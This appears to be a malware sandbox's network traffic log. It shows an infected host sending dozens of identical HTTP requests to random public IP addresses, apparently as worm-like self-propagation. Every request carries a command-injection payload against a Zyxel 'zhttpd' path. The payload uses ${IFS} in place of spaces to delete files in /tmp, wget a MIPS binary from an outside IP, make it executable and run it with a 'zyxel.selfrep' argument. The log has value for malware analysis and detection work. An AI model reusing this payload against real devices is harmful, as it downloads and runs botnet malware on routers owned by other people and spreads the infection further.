                                                        Jan 28, 2024 10:12:41.182905912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1633192.168.2.144740678.54.83.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182965994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1634192.168.2.1456126222.119.61.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183012962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1635192.168.2.1434226202.26.134.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183018923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1636192.168.2.145016281.2.127.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183073044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1637192.168.2.144243462.99.157.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183118105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1638192.168.2.146097025.145.130.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183146000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1639192.168.2.144874668.69.25.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183185101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1640192.168.2.145451434.150.227.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183223963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1641192.168.2.1457278178.125.169.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183242083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1642192.168.2.1443570135.162.30.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183300972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1643192.168.2.143961677.224.93.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183343887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1644192.168.2.1449062172.111.40.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183377981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1645192.168.2.1457796144.183.3.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183420897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1646192.168.2.145403860.140.28.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183480978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1647192.168.2.1444100194.110.43.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183507919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1648192.168.2.145354465.198.198.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183551073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1649192.168.2.1438546196.193.212.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183585882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1650192.168.2.1460432164.224.13.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.183623075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1651192.168.2.145562296.104.140.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187139034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1652192.168.2.1456204206.81.236.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187175035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1653192.168.2.145064435.106.115.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187201977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1654192.168.2.145909888.26.168.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187237024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1655192.168.2.1436558183.153.188.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187268972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1656192.168.2.1433116167.49.229.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187299967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1657192.168.2.1454938160.177.137.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187356949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1658192.168.2.1456618138.16.140.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187369108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1659192.168.2.143939884.67.61.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187398911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1660192.168.2.145762287.130.83.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.187453985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1661192.168.2.145885457.103.116.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195765018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1662192.168.2.1449946117.184.28.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195785046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1663192.168.2.1449326141.16.13.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195817947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1664192.168.2.144977290.176.89.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195837975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1665192.168.2.1450480195.32.136.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195884943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1666192.168.2.144040497.247.224.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195924997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1667192.168.2.145239040.221.204.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195950985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1668192.168.2.143834663.53.54.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.195976019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1669192.168.2.14345905.166.173.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196037054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1670192.168.2.145042476.104.56.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196069002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1671192.168.2.1442050170.4.103.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196105003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1672192.168.2.144875271.58.191.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196127892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1673192.168.2.146067064.16.206.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196178913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1674192.168.2.146058887.181.225.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196213961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1675192.168.2.1448118129.183.108.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196255922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1676192.168.2.144063012.228.247.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196295977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1677192.168.2.144657054.230.255.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196336985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1678192.168.2.145906865.190.210.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196362972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1679192.168.2.1435250200.117.81.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196408987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1680192.168.2.1458066195.123.250.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196449995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1681192.168.2.1457886186.235.203.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196475983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1682192.168.2.144789265.62.40.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196516037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1683192.168.2.1436536117.134.116.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196549892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1684192.168.2.1459006201.109.147.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196594000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1685192.168.2.1446308192.119.124.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196645975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1686192.168.2.143753085.79.208.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196680069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1687192.168.2.1446854128.115.88.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196728945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1688192.168.2.1434222198.14.157.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196769953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1689192.168.2.1454060156.218.154.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196805954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1690192.168.2.1437076181.162.137.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196855068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1691192.168.2.1457322137.34.157.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196897030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1692192.168.2.1448574171.132.159.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196913004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1693192.168.2.1441218165.202.50.132443
                                                        TimestampBytes transferredDirectionData
